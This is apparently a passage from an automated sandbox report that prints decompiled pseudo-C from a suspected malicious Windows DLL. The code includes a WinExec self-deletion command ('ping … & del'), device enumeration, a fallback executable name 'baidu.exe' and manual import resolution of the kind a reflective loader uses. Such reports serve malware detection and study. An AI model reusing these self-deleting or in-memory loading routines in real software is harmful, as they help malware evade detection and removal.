                                                                                                                                                      • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2870529951-0
                                                                                                                                                      • Opcode ID: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                      • Instruction ID: 130607f004240c79eb30421efa65504882722ed8364210b240487f0131cf44a3
                                                                                                                                                      • Opcode Fuzzy Hash: 6c4bbaa7a2ed88e341af398c15252e428cac03d6031402dac072d6ceb804dc07
                                                                                                                                                      • Instruction Fuzzy Hash: 05317F75A043919BF750EFB2888175A77E8EF48381F21C429E909DA356EB34EC418B61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A260, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36processCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A260() {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				int _t15;
				void* _t20;

				_v532 = 0;
				E1000CF20(_t20,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF20(_t20,  &_v267, 0, 0x103);
				GetModuleFileNameA(0,  &_v532, 0x104);
				E1000CC93(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
				_t15 = WinExec( &_v268, 0); // executed
				return _t15;
			}









                                                                                                                                                      0x1001a269
                                                                                                                                                      0x1001a27e
                                                                                                                                                      0x1001a286
                                                                                                                                                      0x1001a29b
                                                                                                                                                      0x1001a2b1
                                                                                                                                                      0x1001a2ca
                                                                                                                                                      0x1001a2db
                                                                                                                                                      0x1001a2e4

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A2BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                      • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                      • API String ID: 2874319085-10483710
                                                                                                                                                      • Opcode ID: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                      • Instruction ID: 1002a94702f99074cc5a7191c0e86848812ee27a6531f1c6c96f6cd2bf050705
                                                                                                                                                      • Opcode Fuzzy Hash: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                      • Instruction Fuzzy Hash: 6EF0AF7988431C6AE720D760DC8AFE9772CAB20700F0005D4F6986A0C1EAF067C88BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A600, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E1001A600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;
				char _v53;
				short _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v72;
				char _v335;
				char _v336;
				signed int _v340;
				void* __ebp;
				intOrPtr _t40;
				void* _t45;
				intOrPtr _t73;

				_t80 = __eflags;
				_t71 = __edi;
				_push(0xffffffff);
				_push(E10022A9E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v340 = 0;
				E10001160( &_v52, __eflags, 0x10024ca1);
				_v8 = 0;
				_v336 = 0;
				E1000CF20(__edi,  &_v335, 0, 0x103);
				GetModuleFileNameA(0,  &_v336, 0x104);
				_t40 = E1001A170( &_v336); // executed
				_v24 = _t40;
				_v72 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v53 = 0;
				E1000CC93(_t71,  &_v72, "%d", _v24);
				_v20 = E1001A480(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
				_t81 = _v20;
				if(_v20 != 0) {
					E10001A90( &_v52, _t81, _v20);
					E10001A90( &_v52, _t81, ".exe");
					_push(_v20);
					E1000CA30(__ebx, _t71, __esi, _t81);
				}
				_t45 = E10001200( &_v52);
				_t82 = _t45;
				if(_t45 == 0) {
					E10001A90( &_v52, _t82, "baidu.exe");
				}
				E10001110(_a4, _t82,  &_v52);
				_v340 = _v340 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v52);
				 *[fs:0x0] = _v16;
				return _a4;
			}






















                                                                                                                                                      0x1001a600
                                                                                                                                                      0x1001a600
                                                                                                                                                      0x1001a603
                                                                                                                                                      0x1001a605
                                                                                                                                                      0x1001a610
                                                                                                                                                      0x1001a611
                                                                                                                                                      0x1001a61e
                                                                                                                                                      0x1001a630
                                                                                                                                                      0x1001a635
                                                                                                                                                      0x1001a63c
                                                                                                                                                      0x1001a651
                                                                                                                                                      0x1001a667
                                                                                                                                                      0x1001a674
                                                                                                                                                      0x1001a67c
                                                                                                                                                      0x1001a67f
                                                                                                                                                      0x1001a685
                                                                                                                                                      0x1001a688
                                                                                                                                                      0x1001a68b
                                                                                                                                                      0x1001a68e
                                                                                                                                                      0x1001a691
                                                                                                                                                      0x1001a695
                                                                                                                                                      0x1001a6a5
                                                                                                                                                      0x1001a6b9
                                                                                                                                                      0x1001a6bc
                                                                                                                                                      0x1001a6c0
                                                                                                                                                      0x1001a6c9
                                                                                                                                                      0x1001a6d6
                                                                                                                                                      0x1001a6de
                                                                                                                                                      0x1001a6df
                                                                                                                                                      0x1001a6e4
                                                                                                                                                      0x1001a6ea
                                                                                                                                                      0x1001a6ef
                                                                                                                                                      0x1001a6f1
                                                                                                                                                      0x1001a6fb
                                                                                                                                                      0x1001a6fb
                                                                                                                                                      0x1001a707
                                                                                                                                                      0x1001a715
                                                                                                                                                      0x1001a71b
                                                                                                                                                      0x1001a725
                                                                                                                                                      0x1001a730
                                                                                                                                                      0x1001a73a

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A651
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A170: FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
                                                                                                                                                        • Part of subcall function 1001A170: FindClose.KERNEL32(000000FF), ref: 1001A1B6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: .exe$baidu.exe
                                                                                                                                                      • API String ID: 3164538923-2273953317
                                                                                                                                                      • Opcode ID: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
                                                                                                                                                      • Instruction ID: 0ef21a583f90a00b500e35e1eebf572a8ff7ffe47b4923fec59976459a260394
                                                                                                                                                      • Opcode Fuzzy Hash: eaae4fab46b1e4210e375406be424a6574653a2564e2719a11e71cc4c1965c93
                                                                                                                                                      • Instruction Fuzzy Hash: E73169B5C10258ABEB14DFA0ED82FEDB7B4FF09744F000169F50AA7281EB746A44CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019960, Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 33%
                                                                                                                                                      			E10019960(void* __ebx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v312;
				char _v572;
				char _v832;
				char _v1092;
				char _v1352;
				char _v1368;
				char _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				signed int _v1384;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t74;
				intOrPtr _t80;
				void* _t85;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t97;
				void* _t116;
				signed int _t150;
				void* _t164;
				void* _t168;
				void* _t171;
				void* _t174;
				void* _t177;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				intOrPtr _t187;
				void* _t188;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t194;
				void* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				void* _t202;
				void* _t203;

				_t116 = __ebx;
				 *[fs:0x0] = _t187;
				_t188 = _t187 - 0x558;
				_v1384 = 0;
				_t74 = E10003170( &_v1368, __eflags);
				_v8 = 0;
				_v1376 = 0;
				_v48 = 0;
				_v1372 = 0;
				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E10022A8C, 0xffffffff); // executed
				_v1380 = _t74;
				if(_v1380 != 0xffffffff) {
					E1000CF20(_t164,  &_v44, 0, 0x1c);
					_t189 = _t188 + 0xc;
					_v44 = 0x1c;
					while(1) {
						_t148 = _v1376;
						_t80 = _v1380;
						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
						if(_t80 == 0) {
							break;
						}
						E1000CF20(_t164,  &_v1352, 0, 0x514);
						_push( &_v1372);
						_push( &_v48);
						_push(0);
						_t191 = _t189 + 0xc - 0x1c;
						_t182 =  &_v44;
						memcpy(_t191, _t182, 7 << 2);
						_t168 = _t182 + 0xe;
						_push(_v1380); // executed
						_t85 = E10019780(_t116, _t182); // executed
						_t193 = _t191 + 0x38;
						_t213 = _t85;
						if(_t85 != 0) {
							E1000D190(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t168, _t182, _t213);
							_t193 = _t193 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(7);
						_t194 = _t193 - 0x1c;
						_t183 =  &_v44;
						memcpy(_t194, _t183, 7 << 2);
						_t171 = _t183 + 0xe;
						_push(_v1380); // executed
						_t88 = E10019780(_t116, _t183); // executed
						_t196 = _t194 + 0x38;
						_t214 = _t88;
						if(_t88 != 0) {
							E1000D190(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t171, _t183, _t214);
							_t196 = _t196 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0x16);
						_t197 = _t196 - 0x1c;
						_t184 =  &_v44;
						memcpy(_t197, _t184, 7 << 2);
						_t174 = _t184 + 0xe;
						_push(_v1380); // executed
						_t91 = E10019780(_t116, _t184); // executed
						_t199 = _t197 + 0x38;
						_t215 = _t91;
						if(_t91 != 0) {
							E1000D190(_t116, _t174, _t184,  &_v832, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t174, _t184, _t215);
							_t199 = _t199 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(0xc);
						_t200 = _t199 - 0x1c;
						_t185 =  &_v44;
						memcpy(_t200, _t185, 7 << 2);
						_t177 = _t185 + 0xe;
						_push(_v1380); // executed
						_t94 = E10019780(_t116, _t185); // executed
						_t202 = _t200 + 0x38;
						_t216 = _t94;
						if(_t94 != 0) {
							E1000D190(_t116, _t177, _t185,  &_v572, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t177, _t185, _t216);
							_t202 = _t202 + 0x10;
						}
						_push( &_v1372);
						_push( &_v48);
						_push(8);
						_t203 = _t202 - 0x1c;
						_t186 =  &_v44;
						memcpy(_t203, _t186, 7 << 2);
						_t164 = _t186 + 0xe;
						_push(_v1380); // executed
						_t97 = E10019780(_t116, _t186); // executed
						_t189 = _t203 + 0x38;
						_t217 = _t97;
						if(_t97 != 0) {
							E1000D190(_t116, _t164, _t186,  &_v312, _v48, _v1372);
							_push(_v48);
							E1000CA30(_t116, _t164, _t186, _t217);
							_t189 = _t189 + 0x10;
						}
						_v1376 = _v1376 + 1;
						E10003310( &_v1368,  &_v1352, _t217,  &_v1352);
					}
					__imp__SetupDiDestroyDeviceInfoList(_v1380); // executed
				}
				E100031A0(_a4, _t148, __eflags,  &_v1368);
				_t150 = _v1384 | 0x00000001;
				__eflags = _t150;
				_v1384 = _t150;
				_v8 = 0xffffffff;
				E10003280( &_v1368); // executed
				 *[fs:0x0] = _v16;
				return _a4;
			}




















































                                                                                                                                                      0x10019960
                                                                                                                                                      0x10019971
                                                                                                                                                      0x10019978
                                                                                                                                                      0x10019980
                                                                                                                                                      0x10019990
                                                                                                                                                      0x10019995
                                                                                                                                                      0x1001999c
                                                                                                                                                      0x100199a6
                                                                                                                                                      0x100199ad
                                                                                                                                                      0x100199bf
                                                                                                                                                      0x100199c5
                                                                                                                                                      0x100199d2
                                                                                                                                                      0x100199e0
                                                                                                                                                      0x100199e5
                                                                                                                                                      0x100199e8
                                                                                                                                                      0x100199ef
                                                                                                                                                      0x100199f3
                                                                                                                                                      0x100199fa
                                                                                                                                                      0x10019a01
                                                                                                                                                      0x10019a09
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019a1d
                                                                                                                                                      0x10019a2b
                                                                                                                                                      0x10019a2f
                                                                                                                                                      0x10019a30
                                                                                                                                                      0x10019a32
                                                                                                                                                      0x10019a3a
                                                                                                                                                      0x10019a3f
                                                                                                                                                      0x10019a3f
                                                                                                                                                      0x10019a47
                                                                                                                                                      0x10019a48
                                                                                                                                                      0x10019a4d
                                                                                                                                                      0x10019a50
                                                                                                                                                      0x10019a52
                                                                                                                                                      0x10019a66
                                                                                                                                                      0x10019a71
                                                                                                                                                      0x10019a72
                                                                                                                                                      0x10019a77
                                                                                                                                                      0x10019a77
                                                                                                                                                      0x10019a80
                                                                                                                                                      0x10019a84
                                                                                                                                                      0x10019a85
                                                                                                                                                      0x10019a87
                                                                                                                                                      0x10019a8f
                                                                                                                                                      0x10019a94
                                                                                                                                                      0x10019a94
                                                                                                                                                      0x10019a9c
                                                                                                                                                      0x10019a9d
                                                                                                                                                      0x10019aa2
                                                                                                                                                      0x10019aa5
                                                                                                                                                      0x10019aa7
                                                                                                                                                      0x10019abb
                                                                                                                                                      0x10019ac6
                                                                                                                                                      0x10019ac7
                                                                                                                                                      0x10019acc
                                                                                                                                                      0x10019acc
                                                                                                                                                      0x10019ad5
                                                                                                                                                      0x10019ad9
                                                                                                                                                      0x10019ada
                                                                                                                                                      0x10019adc
                                                                                                                                                      0x10019ae4
                                                                                                                                                      0x10019ae9
                                                                                                                                                      0x10019ae9
                                                                                                                                                      0x10019af1
                                                                                                                                                      0x10019af2
                                                                                                                                                      0x10019af7
                                                                                                                                                      0x10019afa
                                                                                                                                                      0x10019afc
                                                                                                                                                      0x10019b10
                                                                                                                                                      0x10019b1b
                                                                                                                                                      0x10019b1c
                                                                                                                                                      0x10019b21
                                                                                                                                                      0x10019b21
                                                                                                                                                      0x10019b2a
                                                                                                                                                      0x10019b2e
                                                                                                                                                      0x10019b2f
                                                                                                                                                      0x10019b31
                                                                                                                                                      0x10019b39
                                                                                                                                                      0x10019b3e
                                                                                                                                                      0x10019b3e
                                                                                                                                                      0x10019b46
                                                                                                                                                      0x10019b47
                                                                                                                                                      0x10019b4c
                                                                                                                                                      0x10019b4f
                                                                                                                                                      0x10019b51
                                                                                                                                                      0x10019b65
                                                                                                                                                      0x10019b70
                                                                                                                                                      0x10019b71
                                                                                                                                                      0x10019b76
                                                                                                                                                      0x10019b76
                                                                                                                                                      0x10019b7f
                                                                                                                                                      0x10019b83
                                                                                                                                                      0x10019b84
                                                                                                                                                      0x10019b86
                                                                                                                                                      0x10019b8e
                                                                                                                                                      0x10019b93
                                                                                                                                                      0x10019b93
                                                                                                                                                      0x10019b9b
                                                                                                                                                      0x10019b9c
                                                                                                                                                      0x10019ba1
                                                                                                                                                      0x10019ba4
                                                                                                                                                      0x10019ba6
                                                                                                                                                      0x10019bba
                                                                                                                                                      0x10019bc5
                                                                                                                                                      0x10019bc6
                                                                                                                                                      0x10019bcb
                                                                                                                                                      0x10019bcb
                                                                                                                                                      0x10019bd7
                                                                                                                                                      0x10019bea
                                                                                                                                                      0x10019bea
                                                                                                                                                      0x10019bfb
                                                                                                                                                      0x10019bfb
                                                                                                                                                      0x10019c0b
                                                                                                                                                      0x10019c16
                                                                                                                                                      0x10019c16
                                                                                                                                                      0x10019c19
                                                                                                                                                      0x10019c1f
                                                                                                                                                      0x10019c2c
                                                                                                                                                      0x10019c37
                                                                                                                                                      0x10019c43

                                                                                                                                                      APIs
                                                                                                                                                      • SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 100199BF
                                                                                                                                                      • _memset.LIBCMT ref: 100199E0
                                                                                                                                                      • SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A01
                                                                                                                                                      • _memset.LIBCMT ref: 10019A1D
                                                                                                                                                        • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                        • Part of subcall function 10019780: GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                        • Part of subcall function 10019780: _memset.LIBCMT ref: 100197DE
                                                                                                                                                        • Part of subcall function 10019780: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      • SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019BFB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3323326763-0
                                                                                                                                                      • Opcode ID: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
                                                                                                                                                      • Instruction ID: 92146aaf36cf8da670849d236f9b8fe300c912f778ed1f5ba4bfc820bf5b102a
                                                                                                                                                      • Opcode Fuzzy Hash: 34e1c9ea5a169ca6ee0ccc6309070e38f518e9ff025555c95e667d819486c7d5
                                                                                                                                                      • Instruction Fuzzy Hash: 7381B676D006089BDB14DBA4DC51FEFB379EB48311F048198F509B7281EB35AA85CFA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001AB60, Relevance: 7.7, APIs: 5, Instructions: 180COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 34%
                                                                                                                                                      			E1001AB60(intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				signed int* _v32;
				void* _v36;
				intOrPtr _v40;
				void* __ebp;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t122;
				void* _t130;
				void _t132;
				void _t137;
				void* _t144;
				void* _t159;
				void* _t194;
				void* _t201;
				void* _t202;
				void* _t203;
				void* _t204;

				_t2 = _a4 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(1) {
						_t108 = IsBadReadPtr(_v8, 0x14);
						__eflags = _t108;
						if(_t108 != 0) {
							break;
						}
						_t110 = _v8;
						__eflags =  *(_t110 + 0xc);
						if( *(_t110 + 0xc) == 0) {
							break;
						}
						_t18 = _a4 + 0x34; // 0x118bb84d
						_t23 = _a4 + 0x24; // 0xf3c7e850, executed
						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18); // executed
						_t204 = _t203 + 8;
						_v36 = _t113;
						__eflags = _v36;
						if(__eflags != 0) {
							_t28 = _a4 + 0xc; // 0x52b8558b
							_push(4 +  *_t28 * 4);
							_t32 = _a4 + 8; // 0x98
							_push( *_t32);
							_t115 = E1000E018(_t144,  *_t32, _t201, _t202, __eflags);
							_t203 = _t204 + 8;
							_v28 = _t115;
							__eflags = _v28;
							if(_v28 != 0) {
								 *(_a4 + 8) = _v28;
								_t45 = _a4 + 0xc; // 0x52b8558b
								_t47 = _a4 + 8; // 0x98
								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
								_t52 = _a4 + 0xc; // 0x52b8558b
								 *(_a4 + 0xc) =  *_t52 + 1;
								__eflags =  *_v8;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									__eflags = _t122;
									_v24 = _t122;
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while(1) {
									__eflags =  *_v32;
									if( *_v32 == 0) {
										break;
									}
									__eflags =  *_v32 & 0x80000000;
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t88 = _a4 + 0x34; // 0x118bb84d
										_t130 = _v40 + 2;
										__eflags = _t130;
										_t92 = _a4 + 0x28; // 0xc483ffff
										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
										_t203 = _t203 + 0xc;
										 *_v24 = _t132;
									} else {
										_t78 = _a4 + 0x34; // 0x118bb84d
										_t82 = _a4 + 0x28; // 0xc483ffff
										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
										_t203 = _t203 + 0xc;
										 *_v24 = _t137;
									}
									__eflags =  *_v24;
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_t194 = _v24 + 4;
										__eflags = _t194;
										_v24 = _t194;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								__eflags = _v16;
								if(_v16 != 0) {
									_t159 = _v8 + 0x14;
									__eflags = _t159;
									_v8 = _t159;
									continue;
								}
								_t98 = _a4 + 0x34; // 0x118bb84d
								_t101 = _a4 + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
								SetLastError(0x7f);
								break;
							}
							_t36 = _a4 + 0x34; // 0x118bb84d
							_t39 = _a4 + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}




























                                                                                                                                                      0x1001ab69
                                                                                                                                                      0x1001ab6c
                                                                                                                                                      0x1001ab6f
                                                                                                                                                      0x1001ab80
                                                                                                                                                      0x1001ab8a
                                                                                                                                                      0x1001ab9e
                                                                                                                                                      0x1001abac
                                                                                                                                                      0x1001abb2
                                                                                                                                                      0x1001abb8
                                                                                                                                                      0x1001abba
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001abc0
                                                                                                                                                      0x1001abc3
                                                                                                                                                      0x1001abc7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001abd0
                                                                                                                                                      0x1001abe1
                                                                                                                                                      0x1001abe4
                                                                                                                                                      0x1001abe6
                                                                                                                                                      0x1001abe9
                                                                                                                                                      0x1001abec
                                                                                                                                                      0x1001abf0
                                                                                                                                                      0x1001ac09
                                                                                                                                                      0x1001ac13
                                                                                                                                                      0x1001ac17
                                                                                                                                                      0x1001ac1a
                                                                                                                                                      0x1001ac1b
                                                                                                                                                      0x1001ac20
                                                                                                                                                      0x1001ac23
                                                                                                                                                      0x1001ac26
                                                                                                                                                      0x1001ac2a
                                                                                                                                                      0x1001ac5c
                                                                                                                                                      0x1001ac62
                                                                                                                                                      0x1001ac68
                                                                                                                                                      0x1001ac6e
                                                                                                                                                      0x1001ac74
                                                                                                                                                      0x1001ac7d
                                                                                                                                                      0x1001ac83
                                                                                                                                                      0x1001ac86
                                                                                                                                                      0x1001acaa
                                                                                                                                                      0x1001acb3
                                                                                                                                                      0x1001acb3
                                                                                                                                                      0x1001acb6
                                                                                                                                                      0x1001ac88
                                                                                                                                                      0x1001ac90
                                                                                                                                                      0x1001ac9c
                                                                                                                                                      0x1001ac9c
                                                                                                                                                      0x1001accd
                                                                                                                                                      0x1001acd0
                                                                                                                                                      0x1001acd3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001acda
                                                                                                                                                      0x1001ace0
                                                                                                                                                      0x1001ad12
                                                                                                                                                      0x1001ad18
                                                                                                                                                      0x1001ad1f
                                                                                                                                                      0x1001ad1f
                                                                                                                                                      0x1001ad2a
                                                                                                                                                      0x1001ad2d
                                                                                                                                                      0x1001ad2f
                                                                                                                                                      0x1001ad35
                                                                                                                                                      0x1001ace2
                                                                                                                                                      0x1001ace5
                                                                                                                                                      0x1001acfb
                                                                                                                                                      0x1001acfe
                                                                                                                                                      0x1001ad00
                                                                                                                                                      0x1001ad06
                                                                                                                                                      0x1001ad06
                                                                                                                                                      0x1001ad3a
                                                                                                                                                      0x1001ad3d
                                                                                                                                                      0x1001acc1
                                                                                                                                                      0x1001acc7
                                                                                                                                                      0x1001acc7
                                                                                                                                                      0x1001acca
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad3f
                                                                                                                                                      0x1001ad3f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad3f
                                                                                                                                                      0x1001ad3d
                                                                                                                                                      0x1001ad4d
                                                                                                                                                      0x1001ad51
                                                                                                                                                      0x1001aba6
                                                                                                                                                      0x1001aba6
                                                                                                                                                      0x1001aba9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001aba9
                                                                                                                                                      0x1001ad56
                                                                                                                                                      0x1001ad61
                                                                                                                                                      0x1001ad64
                                                                                                                                                      0x1001ad6b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad6b
                                                                                                                                                      0x1001ac2f
                                                                                                                                                      0x1001ac3a
                                                                                                                                                      0x1001ac3d
                                                                                                                                                      0x1001ac44
                                                                                                                                                      0x1001ac4a
